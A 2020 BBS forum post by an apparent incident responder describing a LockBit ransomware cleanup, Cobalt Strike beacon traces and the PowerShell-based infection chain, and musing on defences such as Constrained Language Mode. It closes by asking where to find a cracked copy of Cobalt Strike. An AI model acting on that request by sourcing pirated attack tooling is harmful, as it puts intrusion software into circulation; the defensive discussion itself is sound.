Subj : Cobalt Strike
To   : All
From : gh0st
Date : Mon Jun 08 2020 00:33:34

I've been working on a client's network and they were hit with a new variant
of lockbit (*.lock2bits) recently.  I ran some scans with the Thor IoC
scanner (nextron-systems.com) and it found traces of Cobalt Strike beacon as
well as a bunch of other IoCs.  It said it found evidence of Putter Panda
tools, but it seems unlikely that it would have been that group.  Anyhow,
back to the subject: Cobalt Strike.

It's pretty scary.  As are a lot of the PowerShell post-exploitation
frameworks like Empire, PowerSploit and PwnedShell.  I'm still working on the
best way to defend against this.  I have a feeling the threat actors still
have persistence.  Likely through a Cobalt Strike beacon that they keep on
movinng laterally throughout the network to avoid detection, as when I
scanned the machine that showed the beacon a second time, it was gone.  I'm
certain they're watching us work.

The payload was triggered from malicious PowerShell that was invoked via
mshtml which invoked cscript and then BASE64 encoded commands.  I ended up
tracing them to a Google Docs spreadsheet and found another instruction
hidden in what looked like a blank cell.  This pointed to another site that
got a few malicious hits on VirusTotal and Hybrid-Analysis.  We blocked that.
But I still have a feeling they're in the network.  My guess is a VPN over
DNS but damned if I can detect it.

I'm kind of rambling.  This has been a crazy cleanup effort.  And it's not
finished.  

So Cobalt Strike.  It's like, $3500 for a license for a year.  I haven't even
searched online yet, but is Cobalt Strike floating around online in a cracked
form?  I'd love to be able to run it through it's paces in my homelab to see
if it will help be defend against it.  I haven't seen a lot online regarding
defense against Cobalt Strike specifically.  Though I'm assuming it would be
crippled, at least in part, but enabling Constrained Language Mode across the
domain which will gut the .NET and system calls that a lot of malicious
PowerShell requires.

Anyways, hopefully someone out there can let me know where I can find Cobalt
Strike or give me any info!

Cheers!

gh0st

--- Mystic BBS v1.12 A45 2020/02/18 (Linux/64)
 * Origin: The Bottomless Abyss BBS * bbs.bottomlessabyss.net (700:100/33)

.